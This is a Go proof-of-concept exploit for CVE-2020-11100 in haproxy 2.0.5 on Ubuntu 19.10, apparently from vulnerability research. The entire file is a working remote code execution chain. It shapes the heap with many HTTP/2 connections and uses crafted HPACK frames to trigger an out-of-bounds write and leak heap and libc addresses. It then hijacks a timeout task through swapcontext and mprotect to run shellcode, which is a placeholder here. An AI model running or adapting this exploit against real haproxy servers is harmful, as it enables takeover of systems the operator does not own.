// haproxy CVE-2020-11100 exploit for haproxy 2.0.5 on Ubuntu 19.10
// fwilhelm [at] google [dot] com

// This is a proof of concept exploit targeting haproxy 2.0.5-1ubuntu0.3,
// libc 2.30-0ubuntu2.1 and openssl 1.1.1c-1ubuntu4 on Ubuntu 19.10.
// Supporting different versions is relatively straightforward in most cases
// by just changing the offsets defined at beginning of the file.
// The exploit was developed against the default configuration on Ubuntu 19.10.
// While largely config independent, more complex configurations and changes to the TLS
// config will require modifications. In particular, we rely on a configured
// connection timeout value.

// There are a couple of comments left in the code that point out potential areas
// of improvement to make the exploit more reliable.

package main

import (
	"crypto/tls"
	"encoding/binary"
	"io"
	"log"
	"os"
	"time"

	"golang.org/x/net/http2"
)

const h2cOffset = 12240       // offset on the heap between dht and next h2c struct
const timeoutOffset = 0xb1bf0 // gdb -q /usr/sbin/haproxy -ex 'p h2_timeout_task' -ex q
const stdinOffset = 0x2292f0  // gdb -q /usr/sbin/haproxy -ex 'p &stdin' -ex q

const libcStdinOffset = 0x1ea980  // gdb -q /lib/x86_64-linux-gnu/libc-2.30.so -ex 'p &_IO_2_1_stdin_' -ex q
const swapContextOffset = 0x58440 // gdb -q /lib/x86_64-linux-gnu/libc-2.30.so -ex 'p swapcontext' -ex q
const mprotectOffset = 0x11bbb0   // gdb -q /lib/x86_64-linux-gnu/libc-2.30.so -ex 'p mprotect' -ex q

var shellcode = [...]byte{0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC}

type http2conn struct {
	c      *tls.Conn
	offset uint
	framer *http2.Framer
}

type leak struct {
	index int
	size  uint
	data  []byte
}

var heapLeak chan leak
var dataLeak chan leak
var quit chan struct{}

func main() {

	if len(os.Args) < 2 {
		log.Printf("usage: ./exploit ip:port")
		log.Printf("usage: ./exploit 127.0.0.1:443")
		return
	}

	target := os.Args[1]

	// Fix TLS version and Cipher suites to avoid weird ciphers breaking our heap layout
	cfg := &tls.Config{
		NextProtos:         []string{"h2"},
		InsecureSkipVerify: true,
		MinVersion:         tls.VersionTLS13,
		CipherSuites:       []uint16{tls.TLS_AES_128_GCM_SHA256},
	}
	cfg.ClientSessionCache = tls.NewLRUClientSessionCache(1024)

	conns := make([]*http2conn, 0)

	c, err := tls.Dial("tcp", target, cfg)

	if err != nil {
		log.Printf("can't connect to target: %v\n", err)
		return
	}
	c.Handshake()

	// Spam http2 connections to empty pools
	// and trigger a [dht]xx[h2c]xxxx[dht]xx[h2c] allocation pattern.
	for i := 0; i < 400; i++ {
		if (i+1)%50 == 0 {
			log.Printf("connecting: %d / 400", i+1)
		}
		c, err := tls.Dial("tcp", target, cfg)
		if err != nil {
			log.Printf("connect error: %v\n", err)
			return
		}
		if _, err := io.WriteString(c, http2.ClientPreface[0:16]); err != nil {
			log.Printf("preface error: %v\n", err)
			return
		}
		conns = append(conns, &http2conn{c: c, offset: 16})
	}

	candidates := conns[len(conns)-40:]

	taskptr := uint64(0)
	stdinAddr := uint64(0)
	h2cPtr := uint64(0)

	heapLeak = make(chan leak, 1)
	dataLeak = make(chan leak, 1)
	quit = make(chan struct{})

	for i, v := range candidates {
		go readWorker(i, v)
	}

	worker := -1
	var targetConn *http2conn

	log.Printf("triggering leak.\n")

loop:
	for j, v := range candidates[0:8] {
		pokeHarder(v)
		tryLeak(v)
		log.Printf("pew %d/7", j)
		time.Sleep(50 * time.Millisecond)
		for _, x := range candidates[j+1:] {
			poke(x)
		}
		select {
		case l := <-heapLeak:
			worker = j
			targetConn = candidates[l.index]
			// This should be improved to make the exploit more stable. We know what a task
			// struct looks like in memory so we could scan for one dynamically in our heap leak, avoiding
			// the need for fixed offsets.
			taskptr = binary.LittleEndian.Uint64(l.data[0x78:])
			h2cPtr = binary.LittleEndian.Uint64(l.data[0x80:])
			log.Printf("leak %d/7 worked! :)", j)
			break loop
		case <-time.After(5 * time.Second):
			log.Printf("leak %d/7 failed", j)
		}
	}

	if worker == -1 {
		log.Printf("[!] heap leak failed. try again and/or fix your offsets\n")
		return
	}

	log.Printf("worker: %d", worker)

	for i := 0; i < 20; i++ {
		conns[i].c.Close()
	}

	haproxyBase := taskptr - timeoutOffset
	stdinPtr := haproxyBase + stdinOffset

	// We assume that our heap leak gave us a pointer to the h2c structure that we targeted with our OOB write.
	// This works for the heap layout that we normally see but isn't very robust
	// A straight forward improvement would be to use our absolute leak to verify this assumption and/or to
	// scan through the complete heap
	dht := h2cPtr - h2cOffset

	log.Printf("leaking libc ptr from haproxy data segment at 0x%x", stdinPtr)

	err = absoluteLeak(candidates[worker], stdinPtr, 2000)
	time.Sleep(50 * time.Millisecond)
	poke(targetConn)

	select {
	case l := <-dataLeak:
		log.Printf("libc leak worked!")
		// This relies on knowing the exact offset of stdin in the haproxy binary.
		// Version independence could be imrpoved by scanning through the data segment to search for
		// stdin/stderr/stdout pointers
		stdinAddr = binary.LittleEndian.Uint64(l.data)
	case <-time.After(5 * time.Second):
		log.Printf("[!] libc leak failed. this shouldn't happen :/")
		return
	}

	for i := 20; i < 40; i++ {
		conns[i].c.Close()
	}

	libcBase := stdinAddr - libcStdinOffset
	swapcontext := libcBase + swapContextOffset
	mprotect := libcBase + mprotectOffset
	log.Printf("swapcontext at 0x%x\n", swapcontext)
	log.Printf("mprotect at 0x%x\n", mprotect)

	log.Printf("overwriting timeout task for 0x%x", h2cPtr)
	err = exploit(candidates[worker], swapcontext, stdinPtr-0x8, dht, mprotect)
	if err != nil {
		log.Printf("%v", err)
	}

	time.Sleep(1 * time.Second)
	log.Printf("poking connection")
	pokeHarder(targetConn)

	log.Printf("done :)")
	time.Sleep(10 * time.Second)
	return
}

// Send the remaining http2 client preface and a empty http2 settings frame.
// This is required before we can send our malicious header frames
func pokeHarder(h *http2conn) error {
	_, err := io.WriteString(h.c, http2.ClientPreface[h.offset:])
	h.framer = http2.NewFramer(h.c, h.c)
	h.framer.WriteSettings()
	return err
}

// Write 1 byte of the http2 client preface over the connection.
// This should be sufficient to trigger processing of the connection in haproxy
// and use our potentially corrupted h2c structure
func poke(h *http2conn) error {
	_, err := io.WriteString(h.c, http2.ClientPreface[h.offset:h.offset+1])
	h.offset = h.offset + 1
	return err
}

// This function generates a HPACK frame that will result in
// an OOB write of value at dht+offset. Can be repeatedly
// used in one http2 connection.
func generatePayload(offset int, value []byte, fill bool) []byte {

	var out []byte

	addHeader := func(count int, l int) {
		for i := 0; i < count; i++ {
			out = appendHeader(out, make([]byte, l), []byte{})
		}
	}

	// Increase head and trigger wrapping
	// The exact buffer sizes are irrelevant as long as we can
	// reach &dht->dte[dht->head] with our last buffer
	addHeader(1, 600)
	addHeader(16, 212)
	// tail header. keep this in the table as long as possible
	addHeader(1, 1)
	// 0 byte header. Trigger bug
	addHeader(1, 0)
	// fill tailroom again
	addHeader(1, 3100)

	// Trigger DTE corruption and overwrite address with choosen offset.
	// Writing the value will trigger OOB write
	o := make([]byte, 4)
	binary.LittleEndian.PutUint32(o, uint32(offset-(861-len(value))))

	payload := make([]byte, 41) // (void *) dht+dht->dte[head].addr + 41 == &(dht->dte[head].addr)
	payload = append(payload, o...)
	payload = append(payload, make([]byte, 861-len(payload)-len(value))...)

	out = appendHeader(out, payload, value)

	// empty table for the next round
	if fill {
		addHeader(1, 3500)
	}
	return out
}

// Trigger a heap leak by corrupting a h2c structure:
// We set h2c->mbuf[0].head to 0x23.
// h2c->mbuf[0x23] is actually the address of &h2c->fctl_list and h2c->mbuf[0x23].area ends up
// being a pointer to itself as the list is empty.
// We also need to write h2c->mbuf[0x23].data (which is actually the size of the leak) to avoid
// wild copies and crashes. This destroys h2c->fctl_list and h2c->sending_list which doesn't bother
// us as long as the connection isn't fully initialized (e.g until the http2 preface was sent by the client) or
// closed.
func tryLeak(h *http2conn) error {

	offset := h2cOffset + 112 // h2c->mbuf[0].head
	payload := generatePayload(offset, []byte{0x23, 0x00, 0x00, 0x00}, true)

	err := h.framer.WriteHeaders(http2.HeadersFrameParam{StreamID: 1,
		BlockFragment: payload, EndStream: true, EndHeaders: true})
	if err != nil {
		return err
	}

	offset = h2cOffset + 1224 // h2c->mbuf[0x23].data
	payload = generatePayload(offset, []byte{0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, true)

	return h.framer.WriteHeaders(http2.HeadersFrameParam{StreamID: 3,
		BlockFragment: payload, EndStream: true, EndHeaders: true})
}

// Leaking an absolute address by corrupting a h2c structure:
// We set h2c->mbuf[0].head to 0x1 and create a fake entry in h2c->mbuf[1]
func absoluteLeak(h *http2conn, addr uint64, num uint64) error {

	offset := h2cOffset + 112 // h2c->mbuf[0].head

	w := make([]byte, 32)
	binary.LittleEndian.PutUint64(w[0:], 1)      // head = 1
	binary.LittleEndian.PutUint64(w[8:], 0x1337) // size != 0
	binary.LittleEndian.PutUint64(w[16:], addr)  // area = addr
	binary.LittleEndian.PutUint64(w[24:], num)   // data = num

	payload := generatePayload(offset, w, true)
	return h.framer.WriteHeaders(http2.HeadersFrameParam{StreamID: 5,
		BlockFragment: payload, EndStream: true, EndHeaders: true})
}

// We overwrite h2c->task->process with a pointer to swapcontext
// and let context (== rsi) point to our header table. The task is normally
// used to enforce http2 connection timeouts
// We also set h2c->timeout to a small value to make sure the function
// is called before other (potentially corrupted) conections trigger their own timeout.
// Finally, we call generateContext to put our fake context + shellcode into the right place
// in the header table
func exploit(h *http2conn, funcptr uint64, writable uint64, dht uint64, mprotect uint64) error {
	offset := 13568 + 0x10 // &h2c->task->process

	w := make([]byte, 16)

	binary.LittleEndian.PutUint64(w[0x0:], funcptr)         // process
	binary.LittleEndian.PutUint64(w[0x8:], uint64(dht)+596) // context

	payload := generatePayload(offset, w, true)

	h.framer.WriteHeaders(http2.HeadersFrameParam{StreamID: 7,
		BlockFragment: payload, EndStream: true, EndHeaders: true})

	offset = h2cOffset + 1136 // h2c->timeout

	w = make([]byte, 4)
	binary.LittleEndian.PutUint32(w[0x0:], 250)
	payload = generatePayload(offset, w, false)
	payload = append(payload, generateContext(writable, dht+596, mprotect)...)

	return h.framer.WriteHeaders(http2.HeadersFrameParam{StreamID: 9,
		BlockFragment: payload, EndStream: true, EndHeaders: true})
}

// Background go routine that permanently tries to read from
// (potentially corrupted) connections. We don't send anything over these
// connections so if we see a large read we know it is triggered by our leaks
func readWorker(i int, h *http2conn) {
	for {
		out := make([]byte, 4096)
		n, err := h.c.Read(out)

		select {
		case <-quit:
			return
		default:
		}

		if n > 200 {
			l := leak{index: i, size: uint(n), data: out}
			if n < 2000 { // we know this is our heap leak
				heapLeak <- l
			} else if n >= 2000 { // data segment leak
				dataLeak <- l
			}
		} else if err != nil {
			//log.Printf("[d] conn %d got error: %v", i, err)
			return
		} else if n != 0 {
			//log.Printf("[d] conn %d read %d bytes", i, n)
		}
	}

}

// function to prepare the argument passed to swapcontext()
// we call mprotect and jump to our shellcode
func generateContext(writable uint64, self uint64, mprotect uint64) []byte {
	var out []byte

	put := binary.LittleEndian.PutUint64

	ctx := make([]byte, 3500)

	// make swapcontext happy
	put(ctx[0x20:], writable)
	put(ctx[0x28:], writable)
	put(ctx[0xe0:], writable)
	binary.LittleEndian.PutUint32(ctx[0x1c0:], uint32(0x1F80))
	// move rsp in front of our shellcode
	put(ctx[0xa0:], self+0x400) // RSP
	// set up mprotect(shellcode, 0x2000, RWX)
	put(ctx[0xa8:], mprotect)            // RIP
	put(ctx[0x68:], (self+0x400)&^0xFFF) // RDI
	put(ctx[0x70:], 0x2000)              // RSI
	put(ctx[0x88:], 0b111)               // RDX

	// return addr after mprotect == beginning of shellcode
	put(ctx[0x400:], self+0x408)

	// copy shellcode
	copy(ctx[0x408:], shellcode[:])

	out = appendHeader(out, ctx, []byte{})
	return out
}

// code below is copied from net/http2

func appendHeader(dst []byte, name []byte, value []byte) []byte {
	dst = append(dst, 0x40)
	dst = appendString(dst, name)
	return appendString(dst, value)
}

func appendString(dst []byte, s []byte) []byte {
	dst = appendVarInt(dst, 7, uint64(len(s)))
	dst = append(dst, s...)
	return dst
}

func appendVarInt(dst []byte, n byte, i uint64) []byte {
	k := uint64((1 << n) - 1)
	if i < k {
		return append(dst, byte(i))
	}
	dst = append(dst, byte(k))
	i -= k
	for ; i >= 128; i >>= 7 {
		dst = append(dst, byte(0x80|(i&0x7f)))
	}
	return append(dst, byte(i))
}
